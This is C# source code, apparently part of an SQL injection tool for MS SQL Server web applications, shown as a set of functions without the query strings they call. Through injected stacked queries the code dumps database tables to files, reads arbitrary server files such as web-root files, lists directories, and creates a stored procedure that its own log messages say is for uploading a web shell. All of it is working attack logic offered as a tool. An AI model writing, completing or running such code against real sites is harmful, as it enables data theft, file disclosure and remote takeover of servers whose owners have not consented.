public static string[] getObjects(string url, string stackedQuery, string replacement) { string URLFortableDumpToTempTable = QueryCrafter.construcQueryForTableDump(url, stackedQuery, replacement); if (ResponseFilter.confirmResponce(URLFortableDumpToTempTable, replacement)) { string URLForTableOutput = QueryCrafter.constructURLForOutputFromTempTable(url); var response = HTTPMethods.getResponse(URLForTableOutput); if (response != null) { response = ResponseFilter.getPureResponse(response); return(ResponseFilter.parseResponce(response)); } else { return(null); } } else { return(null); } }
public static void dumpData(string url, string UserSelectedTable, string[] Columns) { var FileName = ""; if (!String.IsNullOrEmpty((FileName = UserInteraction.takeInputForTableFileGeneration()))) { var XAML = XML.addRoot(ResponseFilter.getPureResponse(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery)))); dumpXML(XAML, UserSelectedTable, FileName, Columns); Log.logNotification("If ur unable to see table Data, dont worry I've another method.."); UserInteraction.promptForUserInput("Press 'n' to try another method OR Press any key to continue.."); var UserInput = Console.ReadLine(); if (UserInput.ToLower() == "n") { XAML = XML.addRoot(ResponseFilter.getPureResponseWithLastIndex(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery)))); dumpXML(XAML, UserSelectedTable, FileName, Columns); } Log.logNotification("Data dump complete.. and if no data is displayed to you.. table might be empty.. Press any key to continue.."); Console.ReadKey(); } FileIO.deleteTempFile("tmp.txt"); }
public static string ReadFileDirect(string url, string fileName) { string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery); string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", fileName); var response = HTTPMethods.getResponse(FinalFileReadURL); if (response != null) { response = ResponseFilter.getPureResponseWithLastIndex(response); if (response != null) { response = response.Replace(" ", ""); return(response); } else { return(null); } } else { return(null); } }
public static bool dropTempTable(string url, string dropTableStackedQuery, string replacement) { url = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement); url = QueryCrafter.constructURLForDroppingObject(url, dropTableStackedQuery); if (HTTPMethods.getResponse(url).Contains(replacement)) { return(true); } else { return(false); } }
static void navigate(string url, string dir) { var URLForNavigating = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadDirWithFuncQuery); URLForNavigating = URLForNavigating.Replace("[DIR]", dir); var response = HTTPMethods.getResponse(URLForNavigating); response = ResponseFilter.getPureResponseWithLastIndex(response); response = XML.addRoot(response); FileIO.createWriteFile(response, "tmp.txt"); List <string> DirectoryFiles = XML.parseXML("tmp.txt", "dir"); Log.showObjects(DirectoryFiles, "DIR Listing"); }
static bool createProcFcUk(string url) { try { var FcUkProcCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery); FcUkProcCreationURL = QueryCrafter.constructURLForConfirmation(FcUkProcCreationURL, QueriesDB.Replacement); if (ResponseFilter.confirmResponce(FcUkProcCreationURL, QueriesDB.Replacement)) { var FcUkProcConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery); var response = HTTPMethods.getResponse(FcUkProcConfirmationURL); if (response != null) { if (ResponseFilter.getPureResponseWithLastIndex(response) == "FcUk") { Log.logOutput("Procedure to Upload Shell is created.."); return(true); } else { Log.logError("1 Procedure to Upload Shell cannot be created.."); return(false); } } else { Log.logError("2 Procedure to Upload Shell cannot be created.."); return(false); } } else { Log.logError("Erroneous response from the server.."); Log.logError("Procedure to Upload Shell cannot be created.."); return(false); } } catch (Exception ex) { Log.logError(ex.Message); return(false); } }
static bool createFuncDir(string url) { try { var DIRFuncCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery); DIRFuncCreationURL = QueryCrafter.constructURLForConfirmation(DIRFuncCreationURL, QueriesDB.Replacement); if (ResponseFilter.confirmResponce(DIRFuncCreationURL, QueriesDB.Replacement)) { var DIRFuncConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery); var response = HTTPMethods.getResponse(DIRFuncConfirmationURL); if (response != null) { if (ResponseFilter.getPureResponseWithLastIndex(response) == "Dir") { Log.logOutput("Function to get Directory Listing is created.."); return(true); } else { Log.logError("Function to get Directory Listing cannot be created.."); return(false); } } else { Log.logError("Function to get Directory Listing cannot be created.."); return(false); } } else { Log.logError("Erroneous response from the server.."); Log.logError("Function to get Directory Listing cannot be created.."); return(false); } } catch (Exception ex) { Log.logError(ex.Message); return(false); } }
public static bool confirmResponce(string url, string _replacement) { try { if (HTTPMethods.getResponse(url).Contains(_replacement)) { return(true); } else { return(false); } } catch (NullReferenceException ex) { Log.logError("No Responce returned from the Server"); return(false); } }
public static void Read(string url) { string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery); string UserChoice = "z"; while (UserChoice != "x") { UserChoice = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext .."); if (UserChoice != "x") { string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", UserChoice); var response = HTTPMethods.getResponse(FinalFileReadURL); if (response != null) { response = ResponseFilter.getPureResponseWithLastIndex(response); if (response != null) { Log.logOutput("--- [File Contents Start] ---"); Log.logOutput(response); Log.logOutput("--- [File Cotents End] ---"); UserChoice = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore.."); if (UserChoice == "s") { SaveFile(response); } UserChoice = "z"; } else { Log.logError("Either File is empty or you 've no right to read that File.."); } } } } }